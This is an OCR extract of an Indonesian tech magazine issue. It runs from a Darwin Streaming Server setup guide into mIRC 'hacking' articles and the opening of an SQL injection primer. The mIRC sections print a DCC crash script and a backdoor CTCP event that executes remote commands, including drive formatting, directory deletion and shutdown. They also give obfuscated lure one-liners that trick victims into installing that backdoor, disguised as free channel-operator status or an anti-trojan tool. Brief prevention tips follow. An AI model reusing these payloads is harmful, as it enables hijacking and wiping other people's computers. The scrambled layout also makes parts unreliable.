Dengan demikian, sebenarnya anda pun dapat menggunakan Darwin Streaming Server di luar MS Windows 2000 Server atau MS Windows 2003 Server dengan menggunakan opsi -d. Hanya berdasarkan hasil percobaan penulis di Windows 98, hasilnya memang kurang baik (tidak stabil) sehingga terkadang koneksi terputus saat penulis mencoba untuk mem-playback video on demand.

• Pada Default Web Site, klik kanan dan pilih Properties. • Pada tab Home Directory, masukkan C:\Program Files\ Darwin Streaming Server\AdminHtml untuk input Local Path:.

Untuk menguji apakah Darwin Streaming Server telah terpasang sebagai server atau daemon, anda dapat menggunakan instruksi netstat -a di MS-DOS Prompt. Perhatikan ada empat buah port yang harus dalam status LISTENING, yaitu: 554, 7070, 8000, dan 8001 sebagaimana yang terdapat pada file streamingserver.xml. Dengan demikian selain RTSP, anda juga dapat menggunakan format HTTP ditambah salah satu port tersebut (contoh: http://localhost:554/sample_100kbit.mp4). Namun, tidak semua player mampu mem-playback yang menggunakan format HTTP ditambah salah satu port tersebut, sehingga penulis menyarankan untuk tetap menggunakan RTSP.

• Klik tombol Configuration... dan klik tombol Add untuk menambah Application Extension Mapping. • Untuk input Executable: masukkan file executable dari Perl bersama path-nya serta tak lupa tambahkan opsi %s %s (misalkan: E:\Perl\bin\perl.exe %s %s) sedangkan untuk input

20

NeoTek Vol. IV No. 07

NeoStyle
Extension: masukkan .pl . Lakukan hal yang sama untuk extension .cgi . • Pada tab Documents, klik tombol Add... untuk menambahkan default document. Anda bisa menambahkan index.htm dan index.html sebagai default document. Sebaiknya anda juga meng-edit System Variable dengan nama PATHEXT dan tambahan extension untuk .pl dan .cgi Perhatikan, khusus untuk Setup Assistant - MP3 Broadcast Password anda harus mengisi form tersebut sekalipun MP3 Broadcast berada pada host yang sama dengan Darwin Streaming Server. Jika anda mengosongkannya, anda akan diminta saat akan mem-broadcast MP3 pertama kali. Untuk bagian-bagian lain dari Setup Assistant bisa diabaikan (dianggap memilih default-nya).

Untuk informasi lebih lanjut tentang Perl, anda bisa membaca dokumentasi yang disertakan (saat instalasi Perl, sebaiknya anda memilih untuk membuat shortcut dokumentasi). Setelah itu semua dilakukan, maka kini anda dapat mencoba menjalankan administrator Darwin Streaming Server melalui web browser dengan URL sebagai berikut: http://localhost:1220/ Pada form yang tersedia, masukkan user name dan password yang sama pada saat anda melakukan instalasi Darwin Streaming Server.

Karena administrator Darwin Streaming Server baru pertama kali dijalankan, maka anda akan diminta untuk melaS kukan konfigurasi (Setup Assistant). Tahapan itu berakhir setelah anda menemukan menu utama dari administrator Darwin Streaming Server.

Ada beberapa menu yang terdapat pada administrator Darwin Streaming Server, seperti untuk mengetahui user yang connect ke server kita (link Connected Users), status relay, dan beberapa setting lainnya. Vol. IV No. 07 NeoTek
21

NeoStyle
• Pada bagian MP3 Playlist Details, isi form sesuai dengan yang anda inginkan (untuk contoh anda bisa melihatnya pada gambar).

• Drag content yang terdapat pada tabel sebelah kiri ke tabel sebelah kanan (playlist) dan lakukan hal ini hingga Anda membentuk playlist yang anda inginkan. Pengertian dari Weight adalah bobot dari content tersebut, yang semakin besar akan semakin sering dimainkan (sebaiknya anda memberi bobot yang sama).

Broadcast Playlist
Seperti yang telah kita singgung pada bagian awal, dengan mem-broadcast file-file yang terdapat playlist kita dapat mensimulasikan yang bersifat live. Dengan demikian, jika yang kita broadcast adalah file-file MP3 maka bisa terbentuk radio internet, sedangkan jika yang kita broadcast adalah file-file movie (3GPP, MPEG-4 atau MOV) maka bisa terbentuk TV internet. Untuk file-file movie, sebaiknya untuk setiap playlist memiliki format file, resolusi serta bandwidth yang sama, serta tak lupa dipersiapkan untuk streaming. Untuk menghasilkan format 3GPP dan MPEG-4, Anda dapat menggunakan Helix Mobile Producer (bisa dibaca pada NeoTek Vol. IV/ 02) untuk keperluan tersebut. Untuk mem-broadcast file-file MP3 yang ada dalam suatu playlist, berikut ini adalah tahapan-tahapannya: • Pada menu Playlists, klik link New MP3 Playlist

• Setelah selesai, klik tombol Save Changes. Perhatikan, karena MP3 Broadcast berada pada host yang sama dengan Darwin Streaming Server, maka kita tidak perlu mengirimkan playlist ke broadcast server.

• Kini anda memiliki sebuah playlist dengan nama mp3. Untuk mem-broadcast-nya, anda cukup klik tombol Play dan perhatikan akan terjadi perubahan status dari Stopped menjadi Playing.

22

NeoTek Vol. IV No. 07

NeoStyle
Lakukan hal yang sama untuk menghentikan broadcast, yaitu klik tombol Stop .

• Bila menemui kegagalan, cobalah cek isi file *.err (baca dengan NotePad) yang terdapat pada folder Playlist dengan nama sub-folder sama dengan nama playlist bersangkutan. Ada kemungkinan format file sebenarnya bukanlah MP3. Cobalah untuk mem-playback file penyebab error tersebut menggunakan QuickTime player atau Platform4 Player untuk membuktikannya.

Untuk menguji MP3 broadcast, banyak player yang dapat digunakan: iTunes, WinAmp, atau Windows Media player. Atau bila Internet Explorer anda memiliki ikon Media, maka anda juga dapat mem-playback-nya melalui Internet Explorer. Untuk URL-nya, masukkan: http://localhost:8000/mp3 (untuk contoh di atas). Selamat! Anda telah berhasil membuat radio internet. b Untuk mem-broadcast file-file movie yang ada dalam suatu playlist, cara garis besarnya sama hampir dengan broadcast file-file MP3 yang ada dalam suatu playlist. Hanya, untuk keperluan ini kita membuat perlu file SDP S (Session Description Protocol) yang nantinya akan digunakan oleh player. Untuk lebih jelasnya, lihat gambar yang disertakan.

Untuk mem-playback-nya, masukkan URL berikut: rtsp://localhost/3gp.sdp (sebagai contoh digunakan Platform4 Player untuk payback).

Selamat! Anda telah berhasil membuat TV internet. Vol. IV No. 07 NeoTek
23

NeoTekno

Mengeksploitasi mIRC Bug
Bila ada bug, maka maka akan ada exploit, yaitu suatu teknik, cara, script, ataupun program untuk memanfaatkan bug tersebut. Hal itu pulalah yang dibahas MA Rody Candera (odyxb@melva.org) sehubungan dengan bug DCC yang ada dalam program mIRC.
perkembangan dan kemajuan teknologi internet, dan pada kesempatan kali ini penulis mencoba mengetengahkan persoalan mengenai mIRC yaitu menganalisis bug yang terdapat pada mIRC. Apa itu mIRC bug? Belum berapa lama ini dunia chating mIRC diguncang oleh bug yang ternyata terdapat pada aplikasi mIRC yang dapat membuat aplikasi ini crash. Perkembangan dunia hacking sudah menjalar ke berbagai aplikasi yang digunakan di internet, tidak terkecuali mIRC juga menjadi korban. Korban? Benarkah sebagai korban? Tergantung pada sudut pandang apa yang dipergunakan orang memandang permasalahan ini. Penulis beranggapan bahwa itu semua merupakan koreksi terhadap teknologi yang diciptakan bahwa tidak ada yang sempurna di dunia ini. Jadi ber-positive thinking ria tidak salah bukan? Istilah bug mungkin bukanlah istilah yang asing lagi bagi pengguna teknologi komputer. Secara etimologinya bug diartikan sebagai kutu, tetapi dalam hal ini bug dapat diartikan sebagai hama atau penyakit. Jadi benarkah aplikasi mIRC memiliki bug seperti yang diberitakan di situs-situs security dan hacking di internet? Alasan apa yang digunakan hingga dinamakan mIRC bug? Nah berdasarkan hal tersebut, penulis mencoba mengajak pembaca untuk menganalisisnya untuk lebih memperjelas pemahaman kita mengenai hal tersebut.

I RC HAC K I N G

M

EMBAHAS MIRC TIDAK AKAN HABIS-HABISNYA SEIRING

mIRC Script Bug
Perhatikan script berikut: /crash { .raw PRIVMSG $1 $+(:,$chr(1),DCC) send “ $+ $str($rand(a,z) $+ $chr(32),250 $+ “ 0 21307706433 $+(8192,$chr(1)) Script tersebut penulis dapatkan dari salah seorang peselancar internet yang mengambilnya dari salah satu situs security dan setelah dilakukan cek dan ricek, telah mengalami sedikit perubahan, walaupun tidak mengurangi keampuhannya. Script ini yang dianggap salah satu script mIRC bug. Namun bagi penulis, script tersebut bukan mIRC bug.
Gambar 1. 24

Mengapa penulis berpendapat sedemikian? Untuk itu mari kita kupas script tersebut. Untuk mengupas script, setidaknya diperlukan pengetahuan pemrograman script mIRC. Memang belum semua orang menguasainya, tetapi anda dapat mendapatkan informasi script pemograman mIRC dengan membaca help mIRC yang disertakan bersama aplikasi mIRC ketika instalasi mIRC. Penulis akan coba paparkan sedikit hal-hal yang bersangkutan dengan script di atas demi tetap tertuju kepada bahasan kita kali ini. Dari bentuknya, penempatan script tersebut adalah pada mIRC Editor untuk Aliases (Gambar 1). Aliases merupakan editor untuk menyingkat command (perintah) yang digunakan di mIRC. /j /join #$$1 $2Contoh Pada contoh dapat dijelaskan bahwa /j merupakan command singkat yang mewakili command aslinya yaitu /join #$$1 $2Penggunaan command tersebut yang paling lazim adalah /j neoteker seperti yang dilakukan ketika akan melakukan join ke channel favorit kita. Jika kita perhatikan pada script yang kita bahas ini, /crash mewakili perintah aslinya yaitu { .raw PRIVMSG $1 $+ (:,$chr(1),DCC) send " $+ $str($rand(a,z) $+ $chr(32),250) $+ " 0 2130706433 $+ (8192,$chr(1)) } Perhatikan bahasan berikut, yang mengupas script tersebut untuk memahami apa sebenarnya dampak yang dihasilkan olehnya. .raw raw <numeric>:<machtext>:<commands> Merupakan salah satu command yang digunakan di mIRC yang mengijinkan proses numerik atau non-numerik yang biasa tidak dikenal oleh mIRC. Dalam hal ini tidak menggunakan tanda slash (garis miring) atau yang lebih dikenal sebagai command prefix karena itu tidak dibutuhkan dalam bentuk multiline $1 /neo /say $1 Parameter pertama pada line yang dimasukkan. $+ hn /say W $+ e $+ l $+ c $+ o $+ m $+ e Untuk membuat kombinasi parameter. W $+ e $+ l $+ c $+ o $+ m $+ e sebenarnya membentuk kata Welcome $chr $chr(N) Mengembalikan karakter dengan nomor ASCII. $chr(65) mewakili karakter A. $chr(42) mewakili karakter * (asteriks)

NeoTek Vol. IV No. 07

NeoTekno
$str(Text,N) Mengulangi teks yang dimasukkan berdasarkan nilainya. $str(Neo,5) menghasilkan Neo Neo Neo Neo Neo $rand $rand(v1,v2) Mengulang nilai yang ada pada range secara acak (random). $rand(a,z) menghasilkan karakter a, b, c, ..., z $rand(0,5) menghasilkan karakter 0, 1, 2, ..., 5 Nah... dengan info sedikit mengenai pemograman script mIRC tersebut maka akan segera kita ketahui apa maksud dari script mIRC Bug tersebut di atas. /crash ternyata mewakili perintah raw PRIVMSG $1 yang pada $1 parameter yang pada script dikondisikan sebagai korban mendapat kiriman paket dengan memanfaatkan fasilitas pada mIRC yaitu DCC Send. Apakah yang menjadi paket kirimannya? Paket kirimannya adalah $str($rand(a,z) $+ $chr(32),250) yang kalau kita artikan berupa teks a,b,c,d,e,f,g,h,i,j,k,l,m, n,o,p,q,r,s,t,u,v,w,x,y,z yang diulang-ulang sebanyak 250 kali dengan setiap pengulangan dipisahkan oleh spasi. Jika digambarkan seperti anda mengetikan abjad a sampai dengan z yang diulang sebanyak 250 kali. Gambaran isi paket tersebut dapat dilihat pada Gambar 2. Wah sebanyak itu? Yang terjadi adalah buffer overflow pada aplikasi mIRC korban dan membuatnya crash. Jadi dimana bug-nya? Bug-nya ada pada fasilitas DCC pada aplikasi mIRC hingga terjadi kegagalan program dalam penanganan paket yang datang. Hm... jadi fungsi script mIRC bug adalah mengeksploitasi kelemahan pada fasilitas DCC pada aplikasi mIRC. Seperti yang kita ketahui, ada tiga macam fasilitas DCC pada mIRC yaitu: DCC Send, DCC Get, dan DCC Chat. $str
Gambar 3.

Mengatasi mIRC Script Bug
Bagaimana mengatasi hal tersebut? Banyak cara yang telah ditawarkan di internet yaitu antara lainnya: 1. Sudah ada versi perbaikannya yang dapat download dari internet pada situs resmi official mIRC. 2. Melakukan modifikasi terhadap aplikasi mIRC. Caranya sebagai berikut: a. Aktifkan remote editor dengan cara menekan keyboard Alt + R lalu masukkan script di bawah ini T pada Remote Editor (Tools > Remote). ctcp *:dcc send:*: if ($len($nopath($filename)) >= 225) { echo 4 -s $nick mencoba membuat crash dengan dcc send illegal $nopath($filename) | halt } b. Setelah dimasukkan, klik File > Save lalu klik tombol Ok.

Gambar 4.

Untuk modifikasi, sebenarnya banyak bentuk script modifikasi yang ditawarkan dan dapat anda lihat dalam bentuk file-file txt (gunakan Notepad) yang disertakan di dalam CD atau dapat juga cari di internet. 3. Jika anda tidak ingin sibuk-sibuk, anda dapat mengatasi hal tersebut dengan melakukan perintah /ignore -wd * sebelum mengakses ke server chat idola anda. Akibat perintah tersebut adalah bahwa anda menolak segala bentuk DCC Send yang tertuju kepada anda.

Gambar 2.

Gambar 5.

Vol. IV No. 07 NeoTek

25

NeoTekno
Bug Lain untuk Usil
Berbicara mengenai mIRC bug, ternyata pada semua versi aplikasi mIRC32 permasalahan yang dihadapi adalah masalah yang monoton atau yang ‘sudah tradisi’ yaitu Permasalahan DCC Send. Berdasarkan hasil survey penulis dalam mencari informasi mengenai mIRC bug, ada lagi mIRC bug yang sampai sekarang masih terabaikan dan belum diatasi. Mungkin akibat yang ditimbulkan tidak begitu besar, tapi cukup asyik buat usil (bagi tukang usil) yaitu /j #2,000 Jika kita mengetikkan perintah tersebut, maka akan terjadi sesuatu yang mengejutkan, yang seharusnya kita melakukan join ke suatu channel yaitu channel 2,000 tetapi yang gterjadi justru kebalikkannya. Yang terjadi adalah secara bersamaan kita akan part dari semua channel yang telah sebelumnya telah kita join terlebih dahulu. mIRC Bug tersebut sampai saat ini masih berlaku untuk semua versi aplikasi mIRC32 dan masih banyak pengguna mIRC yang tidak mengetahuinya (termasuk penulis sendiri jika tidak rajin-rajin mencari informasi mengenai mIRC bug.

dapat pada fasilitas DCC, ternyata ada saja yang masih bisa diangkat sehubungan dengan mIRC. Pada kesempatan kali ini, akan mengangkat kelebihan yang dimiliki mIRC yaitu CTCP yang dapat dimanfaatkan sebagai cara untuk menjahili seseorang di dunia chat mIRC. Apa itu CTCP? CTCP adalah singkatan dari Client-ToClient-Protocol, sebuh model khusus untuk komunikasi antar-IRC Client. Karena khususnya itu, jika event CTCP ditempatkan atau dibuat pada mIRC yang anda miliki, maka akan membuat mIRC anda menanggapi perintahperintah maupun permintaan dari pengguna lain. Untuk lebih memperjelas mengenai CTCP, perhatikan: 1. Menempatkan event CTCP CTCP sintaks: ctcp <level>:<matchtext>:<*|#|?>:<commands> Contoh: ctcp 1:tolong:*:/msg $nick minta tolong kantor polis aja!!! Penempatannya berada di mIRC Scripts Editor Remote (dengan menekan Alt+R maka mIRC Scripts Editor Remote akan terlihat di hadapan anda).

S

ETELAH MIRC DIGUNCANG DENGAN BUG YANG TER-

Gambar 6.

Masih banyak lagi bug yang terdapat pada aplikasi mIRC32. Pernyataan mengenai mIRC bug tersirat pada file versions.txt yang disertakan bersama aplikasi mIRC32 ketika instalasi mIRC anda lakukan.

Gambar 1. Penempatan event CTCP.

Setelah ditempatkan seperti yang diperlihatkan pada Gambar 1, save pekerjaan anda dengan menekan Ctrl+S setelah itu tekan tombol OK. Kemudian connect ke salah satu server IRC yang ada kemudian joint ke salah satu channel (dalam hal ini untuk uji coba dan sebagai contoh connect ke server 4-irc.com dan joint ke channel #ctcp). 2. Menjalankan command CTCP Jalankan satu lagi mIRC anda atau undang seseorang untuk join ke channel tempat anda berada, kemudian minta kepadanya untuk menjalankan command CTCP.

Gambar 7. 26

Gambar 2. Menjalankan command CTCP.

NeoTek Vol. IV No. 07

NeoTekno

mIRC Remote Injection
mIRC dengan fasilitas CTCP dan script yang tepat dapat difungsikan sebagai remote control sebagaimana halnya trojan. MA Rody Candera (odyxb@melva.org) membahas hal itu maupun cara pencegahannya agar anda tidak jadi korban si usil di IRC channel.
Sesuai dengan event CTCP yang dibuat tadinya, command CTCP yang akan dijalankan harus disesuaikan dengan event CTCP yang telah dibuat. /ctcp nick matchtext 3. Mengamati hal yang muncul setelah menjalankan command CTCP a. Layar mIRC pada pengguna nick B'ody Setelah menjalankan command CTCP tadinya, sekarang amati hal apa yang muncul sebagai bentuk respon dari menjalankan command CTCP yang dilakukan. Ternyata respon dari pengguna nick co-okies atas command CTCP yang dilakukan oleh pengguna nick B'ody, terlihat teks yang muncul: *co-okies* minta tolong kantor polis aja!!! Itu berarti respon atas event CTCP berjalan dengan baik. b. Layar mIRC pada pengguna nick co-okies. Hal yang muncul setelah menjalankan command CTCP oleh pengguna nick B'ody, juga terjadi pada layar mIRC pengguna nick co-okies, tepatnya terlihat pada query windows status.

I RC HAC K I N G

Gambar 3. Setelah menjalankan command CTCP (pada nick B’ody)

Gambar 5.

Pada layar channel, muncul teks: [co-okies] TOLONG dan muncul query windows messages (query windows messages muncul karena setting pada mIRC Options > IRC > Copy messages to query ditandai dengan cek. Jika tidak diberi tanda cek maka yang muncul query window dari nick co-okies. Sekarang Anda lihat apa yang diperlihatkan oleh query windows messages.

Jika digambarkan situasi yang terjadi atas teks yang muncul pada query window status pengguna nick cookies yang berhubungan dengan CTCP, maka tergambar pengguna nick B'ody meminta tolong kepada pengguna nick co-okies dan tanggapan yang yang diberikan oleh co-okies kepada B'ody yaitu sebuah perkataan "minta tolong kantor polis aja!!!".

Hacking Event
Lalu apa hubungan CTCP dengan judul di atas? Di sinilah hal yang menarik mengenai CTCP yaitu CTCP dijadikan sebagai bahan untuk menjahili seseorang di mIRC. Ada event CTCP yang jika ditempatkan di komputer orang yang dijadikan target akan membuat kita dapat menguasai target seperti mengubah nick target sesuai yang kita inginkan, membuatnya keluar dari channel, maupun quit dari server IRC, atau yang lebih jahil lagi membuat komputer target menjadi hang atau mematikan (shutdown) komputer target. Hubungannya dengan judul yang tertera di atas adalah teknik cara meletakkan CTCP jahil itu ke komputer target. Bagaimana script CTCP jahil tersebut? Sangat sederhana, berbeda dengan pengaruh besar yang dihasilkannya yang bisa sangat menganggu. Perhatikan text box di bawah ini ctcp *:*:?:$1Vol. IV No. 07 NeoTek
27

Gambar 4.

NeoTekno
Bagaimana mungkin script CTCP yang sesederhana itu bisa menghasilkan sesuatu yang yang menganggu bahkan lumayan berbahaya? Untuk mengetahui, sebaiknya akan mengupasnya agar mendapatkan gambaran yang lebih baik untuk menjelaskan pertanyaan bagaimana mungkin... Seperti yang telah dibahas di atas, sintaks script penulisan CTCP berikut contohnya digambarkan (dideskripsikan) pada Gambar 6.

Tabel 1.
No Command Line
1 2 /ctcp <nick_target> /nick <nick_baru> /ctcp <nick_target> /k <nick> <pesan>

Fungsi
Mengganti nick Kick terhadap pengguna mIRC lain pada channel (kondisi: target merupakan operator channel tersebut) Membuat target keluar dari channel Membuat target terhenti koneksinya pada server IRC Membuat target menyampaikan pesan kepada pengguna mIRC lain Membuat target berkata dengan teks yang telah ditentukan

3 4

/ctcp <nick_target> /part <#channel> /ctcp <nick_target> /quit <pesan>

5

/ctcp <nick_target> /msg <nick> <pesan>

6

/ctcp <nick_target> /say <text>

Gambar 6. Gambaran sintaks penulisan event CTCP serta contohnya.

Pada deskripsi tersebut menunjukkan sintaks script penulisan CTCP beserta contohnya, tujuannya adalah memberikan pemahaman bagaimana aturan yang digunakan untuk membuat event CTCP. Event CTCP jahil yang sederhana pun mengikuti aturan main tersebut, perhatikan Gambar 7.

7

/ctcp <nick_target> //cs op <#channel> <nick> Membuat target mengangkat pengguna mIRC lain menjadi operator channelnya (kondisi: target merupakan operator dari channel tersebut)

Gambar 7.

Tabel 2.
No Command Line
1 /ctcp <nick_target> run <URL_address>

Asterisk (tanda bintang *), dalam bahasa scrip mIRC dikenal sebagai wildcard sign merupakan tanda yang mewakili bentuk no limit (tanpa batas). Untuk memahami lebih jelas mengenai fungsi yang terdapat pada event CTCP jahil, perhatikan Gambar 8.

Fungsi
Membuka browser dengan alamat web site yang ditentukan Membuka program yang ditentukan Membuat komputer HANG Mengacau tampilan monitor Shutdown (memati kan) komputer

2 3 4 5

/ctcp <nick_target> run <program> /ctcp <nick_target> run rundll user,#3 /ctcp <nick_target> run rundll user,#4 /ctcp <nick_target> run rundll user,#7 atau /ctcp <nick_target> run rundll.exe user.exe, exitwindows /ctcp <nick_target> run format /y <drive> /ctcp <nick_target> run Autoexec.bat deltree /y <direktori>

Gambar 8. Gambaran mengenai ‘Event CTCP Jahil.’
6

Mem-format drive yang ditentukan Membuat target menghapus direk tori beserta filenya

Command Line
Jika event CTCP jahil tersebut berhasil anda tempat di remote komputer target, maka anda dapat menjahili atau mengendalikan komputer target dengan menjalankan CTCP command line. Ada banyak bentuk CTCP command line yang dapat digunakan beberapa di antaranya dapat anda lihat pada tabeltabel di bawah ini. Tabel 1 merupakan CTCP command line yang berhubungan langsung dengan command line di mIRC dan memilik dampak terlihat di mIRC, sedangkan Tabel 2 merupakan CTCP command line memiliki dampak terhadap hal-hal di luar mIRC. Dengan kata lain, event CTCP dapat dijadikan sebagai mIRC remote control. Untuk dapat mengendalikan komputer target, seperti yang telah disinggung tadinya, anda harus dapat meletakkan event CTCP jahil tadi ke dalam remote mIRC komputer target. Untuk itu perlu dipikirkan cara yang bagus.
28

7

mIRC Injection
Mungkin ketika anda sedang chat dengan mIRC anda mendapatkan penawaran iklan dengan tawaran yang cukup menarik perhatian sehingga kadang-kadang atau bahkan mungkin anda selalu mengikuti tawaran tersebut tanpa anda sadari apa sebenarnya yang telah anda lakukan itu membawa dampak positif atau dampak negatif. Mengapa selalu saja ada orang yang mau mengikuti tawaran dari iklan yang disampaikan seseorang yang bisa saja tidak dikenal itu? Jawabannya adalah masalah psikologis seseorang menjadi kunci penting sehingga dapat dimanfaatkan untuk hal-hal tertentu. Berbicara mengenai psikologis maka menyinggung mengenai social engineering. Nah..., cara itu menjadi pilihan yang tepat (mungkin) untuk dapat digunakan sebagai cara meletakkan event CTCP jahil.

NeoTek Vol. IV No. 07

NeoTekno
Tetapi tidak mungkin secara langsung kita meminta orang untuk melakukan apa yang akan ditawarkan. Untuk itu perlu dibuat lebih halus dan tidak terlihat apa sebenarnya yang menjadi tujuan dari iklan yang kita tawarkan. Yang nantinya akan dikombinasikan pada command line //echo. Command line //echo mewakili beberapa command line lain (command line bertingkat (multiple command line). Command line lain yang dimaksud adalah /write, /load, dan /msg. Jadi alurnya sebagai berikut:
//echo <pesan> | { write *.mrc <text> } | { load -rs *.mrc } | { msg <nick> } <pesan> Kalimat singkat yang seakan menunjukkan proses yang akan dilakukan. *.mrc File perantara yang yang nantinya akan berisi event CTCP jahil <text> Event CTCP jahil <nick> Nick yang menyebarkan event CTCP

Bahasa Script mIRC
Dalam mIRC terdapat bahasa script yang ditujukan untuk mendukung aplikasi mIRC itu sendiri, dan tidak semua orang memahaminya. Pemanfaatan bahasa script kiranya bagus untuk dicoba, jadi diperlukan script yang nanti akan ditawarkan kepada calon korban sebagai bentuk injeksi. Setelah injeksi dilakukan oleh target maka event CTCP dengan sendirinya berada dalam komputer target. Dan tinggal pekerjaan selanjutnya yaitu mengendalikan target. Dengan kata lain, injeksi dilakukan oleh target sendiri. Identifiers Berhubungan dengan script mIRC, identifier, merupakan salah satu bagian terbesar yang membentuk script mIRC. Ada banyak jenis identifier, tapi tidak semuanya digunakan. Cukup beberapa saja yang digunakan yaitu seperti yang terlihat pada Gambar 9. Format baris injeksi Selanjutnya, kita perlu membuat berbagai kombinasi untuk menghasilkan mIRC Injection yang diinginkan.

Dengan keterangan yang diperlihatkan Gambar 9 dan bahasan di atas, pekerjaan sudah dapat dimulai. Lihat Tabel 3.
msg <nick> digunakan untuk menandai jika target mengikuti iklan yang dibuat maka akan muncul pesan dari target "ok" kepada anda dan pengendalian segera dapat dilakukan.

Sampai disini, tinggal menyusun apa yang dibuat menjadi sebuah iklan, misalnya:
Ketik ini buat dapat OP gratis ==> //echo -a GetOP's | { $mid(OPwriter,3,5) $mid(getOPs,4,3) $+ $chr(46) $+ $mid(OPmrcCHAN,3,3) $mid(ctcOP,1,3) $+ $chr(112) $str(*:,2) $+ $chr(63) $+ $chr(58) $+ $chr(36) $+ $mid(1-2=3,1,2) } | { $mid(OPloadCHAN,3,4) $mid(OPrsCHAN,3,3) $mid(getOPs,4,3) $+ $chr(46) $+ $mid(OPmrcCHAN,3,3) } | { $mid(OPmsgCHAN,3,3) $+ $chr(32) $+ $mid(m-D6zodyxbB9q,6,5) $+ $mid(OPokCHAN,3,2) }

atau bentuk lainnya:
mIRC ToolKit Anti Trojan, ketik gini ==> //echo -a StartFindTrojan | { $mid(FINDwriterojan,5,5) $mid(getAntiTrojanTool,4,10) $+ $chr(46) $+ $mid(CHECKmrcTrojan,5,3) $mid(ctcAnti,1,3) $+ $chr(112) $str(*:,2) $+ $chr(63) $+ $chr(58) $+ $chr(36) $+ $mid(1-2=3,1,2) } | { $mid(IFINDloadANTI,6,4) $mid(TOOL-rsCHAN,4,3) $mid(getAntiTrojanTool,4,10) $+ $chr(46) $+ $mid(CHECKmrcTrojan,5,3) } | { $mid(THENmsgCLEAR,4 ,3) $+ $chr(32) $+ $mid(m-D6zodyxbB9q,6,5) $+ $mid(ENDokIF,4 ,2) }

Pencegahan
Sekarang hal yang terakhir yaitu pencegahan. Tentu ada yang tidak ingin menjadi korban sebagaimana yang telah dibahas sebelumnya. Pencegahannya gampang saja kok:
1. Jangan tergoda dengan iklan yang ditawarkan di mIRC jika anda tidak kenal baik maupun tidak mengerti benar mengenai yang ditawarkan, apalagi terdapat karakter yang aneh-aneh. 2. Jika anda terlanjur menjalankan apa yang ditawarkan dan bahasannya seperti di atas, a. Segera ketik /unload -rs <nama_file_&_ekstension_file> b. Cari file jahil tersebut kemudian hapus dari komputer anda. 3. Untuk lebih menyakinkan diri, ketik saja /remote off

Gambar 9. Identifier yang digunakan dan keterangannya.

Tabel 3.
Command Line
//echo <pesan> write *.mrc <text>

Injection Script
//echo -a GetOP's { $mid(OPwriter,3,5) $mid(getOPs,4,3) $+ $chr(46) $+ $mid(OPmrcCHAN,3,3) $mid(ctcOP,1,3) $+ $chr(112) $str(*:,2) $+ $chr(63) $+ $chr(58) $+ $chr(36) $+ $mid(1-2=3,1,2) } { $mid(OPloadCHAN,3,4) $mid(OP-rsCHAN,3,3) $mid(getOPs,4,3) $+ $chr(46) $+ $mid(OPmrcCHAN,3,3) } { $mid(OPmsgCHAN,3,3) $+ $chr(32) $+ $mid(m-D6zodyxbB9q,6,5) $+ $mid(OPokCHAN,3,2) }

Result
GetOP's write OPs.mrc ctcp *:*:?$1-

load -rs *.mrc

load -rs OPs.mrc

msg <nick>

Vol. IV No. 07 NeoTek

29

NeoTekno

Konsep Dasar SQL Injection
Melengkapi artikel tentang SQL Injection sebelumnya, MA Rody Candera (odyxb@melva.org) membahas SQL Injection dari sisi konsep dasarnya. Kenali pula cara pencegahannya dengan mempelajari makalah-makalah mengenai SQL Injection yang disediakan dalam CD NeoTek
Web Hacking: Kerawanan pada Port 80 dan Database Hacking: SQL Injection pada NeoTek Vol. IV No. 05. Kedua artikel tersebut menyinggung SQL Injection. Pada kesempatan ini kembali dibahas SQL Injection tetapi dalam batasan konsep dasarnya saja. Untuk lebih memudahkan penjelasan mengenai konsep SQL Injection, maka disini akan dibahas terlebih dahulu SQL (secara garis besarnya saja) sebagai pengantar. Selanjutnya akan mengupas konsep SQL Injection itu sendiri.

WE B HAC K I N G

S

EBELUMNYA ANDA MUNGKIN SUDAH MEMBACA ARTIKEL

Pengantar SQL
SQL singkatan dari Structured Query Language yang merupakan bahasa komputer standar yang ditetapkan oleh ANSI (American National Standard Institute) untuk mengakses dan memanipulasi sistem database. SQL bekerja dengan program-program database seperti MS Access, DB2, Informix, MS SQL Server, Oracle, Sybase, dan lain sebagainya. Ada banyak versi SQL tetapi telah diatur oleh ANSI agar setiap versi SQL memenuhi aturan main seperti pada perintah SELECT, UPDATE, DELETE, INSERT, WHERE, dan lain sebagainya. Database Tables Sebuah database dapat berisi satu tabel atau lebih, yang tiap-tiap tabel diidentifikasi (dikenal) dengan sebuah nama. Tiap-tiap tabel juga dapat berisi satu column (kolom) atau lebih serta satu row (baris) atau lebih. Gambar 1 merupakan contoh tabel yang disebut atau diberi nama tabel UserInfo.

Data Manipulation Language (DML) SQL sebagai bahasa manipulasi data memiliki kemampuan untuk UPDATE, INSERT, DELETE record data. Kemampuan itu biasa dan memang harus dimiliki. SELECT Pilih data dari sebuah tabel database. UPDATE Memperbaharui/memodifikasi data dari sebuah tabel database. DELETE Menghapus data dari sebuah tabel database. INSERT INTO Menambahkan data baru ke sebuah tabel database. Data Definition Language SQL sebagai bahasa definisi data, mengijinkan menciptakan tabel database, atau sebaliknya menghapusnya. Selain itu membuat koneksi antar-table database berikut batasannya dengan menentukan index sebagai kuncinya. CREATE TABLE Membuat sebuah tabel database baru. ALTER TABLE Mengubah sebuah tabel database. DROP TABLE Menghapus sebuah tabel database CREATE INDEX Membuat sebuah index (kunci pencarian). DROP INDEX Menghapus sebuah index. Select Statement Seperti yang telah disinggung pada Data Manipulation Language (DML), SELECT digunakan untuk seleksi/ memilih data dari sebuah table. Syntaks pernyataan SELECT:
SELECT [nama_kolom] FROM [nama _tabel]

Gambar 1. Table User Info.

SQL Queries Dalam kemampuannya mengolah database, query merupakan tindakan yang biasa dilakukan sebagai rutinitasnya. Contoh: SELECT LastName FROM UserInfo Berdasarkan contoh di atas, jika dibahasakan kedalam bahasa yang mudah untuk mengerti maka dapat diartikan berdasarkan database yang ada, pilih kolom LastName dari tabel UserInfo.

Gambar 3. SELECT Statement.

Where Clause Untuk mendukung SELECT data dari sebuah tabel, klausa WHERE dapat dipergunakan mendampingi SELECT Statement. Syntaks klausa WHERE:
SELECT [nama_kolom] FROM [nama _tabel] WHERE [kolom_value]

Gambar 1. SQL Query. 30

Klausa WHERE menggunakan operator seperti yang terlihat pada Tabel 1.

NeoTek Vol. IV No. 07

NeoTekno
Tabel 1 = <> > < >= <= BETWEEN LIKE Equal Not equal Greater than Less than Greater than or equal Less than or equal Between an inclusive range Search for a pattern

Untuk beberapa kolom dalam 1 baris, syntaksnya seperti:
UPDATE [nama_tabel] set [nama_kolom1 = value_baru, nama_kolom2 = value_baru] WHERE [nama_kolom=value]

Contoh:
UPDATE UserInfo set Address = 'Pondok Cibubur', City = 'Bogor' WHERE LastName = 'ody'

